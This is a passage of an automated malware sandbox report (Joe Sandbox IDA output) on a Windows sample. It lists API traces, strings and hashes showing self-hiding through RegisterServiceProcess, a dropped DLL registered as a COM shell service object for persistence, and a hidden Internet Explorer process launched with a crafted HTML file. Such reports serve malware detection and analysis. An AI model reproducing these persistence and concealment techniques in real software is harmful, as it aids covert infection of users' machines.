                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE

                            Control-flow Graph

                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Oceoll32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Oceoll32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Oceoll32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Oceoll32,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Oceoll32$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-1259788398
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD

                            Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                            • Blocks: 69 404148-404190 RegCreateKeyExA; 70 404193-404198; 71 40419a-4041c2 RegSetValueExA RegCloseKey
                            • Edges: 69->70, 70->70, 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754

                            Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                            • Blocks: 72 40365e-403682 GetFileSize LocalAlloc; 74 403684-40368a; 75 40368c-40368f; 76 403692-4036b2 ReadFile CloseHandle
                            • Edges: 72->74, 72->75, 74->76, 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E

                            Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                            • Blocks: 78 407980-40798f GetCommandLineA; 79 407991-4079a4 strchr; 80 4079b4-4079b9; 81 4079a6-4079a9; 82 4079cf-4079dc GetModuleHandleA call 406c29; 83 4079c0; 84 4079bb-4079be; 86 4079ac-4079af; 87 4079b3; 88 4079c3-4079c8; 89 4079e1-4079e3; 90 4079b1; 91 4079ab; 92 4079ca-4079cd; 93 4079c2
                            • Edges: 78->79, 78->80, 79->81, 79->82, 80->83, 80->84, 81->86, 82->89, 83->88, 84->83, 84->87, 86->90, 86->91, 87->80, 88->82, 88->92, 90->82, 91->86, 92->82, 92->93, 93->88
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B

                            Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                            • Blocks: 94 401219; 95 40121f-40127f __GetMainArgs call 407980; 97 401284-401293 exit
                            • Edges: 94->95, 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F

                            Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                            • Blocks: 98 40121f-40127f __GetMainArgs call 407980; 100 401284-401293 exit
                            • Edges: 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1984909716.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000006.00000002.1984877041.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1984987976.000000000042E000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985021547.000000000042F000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985056539.0000000000436000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1985094721.0000000000438000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_Oeanchcn.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
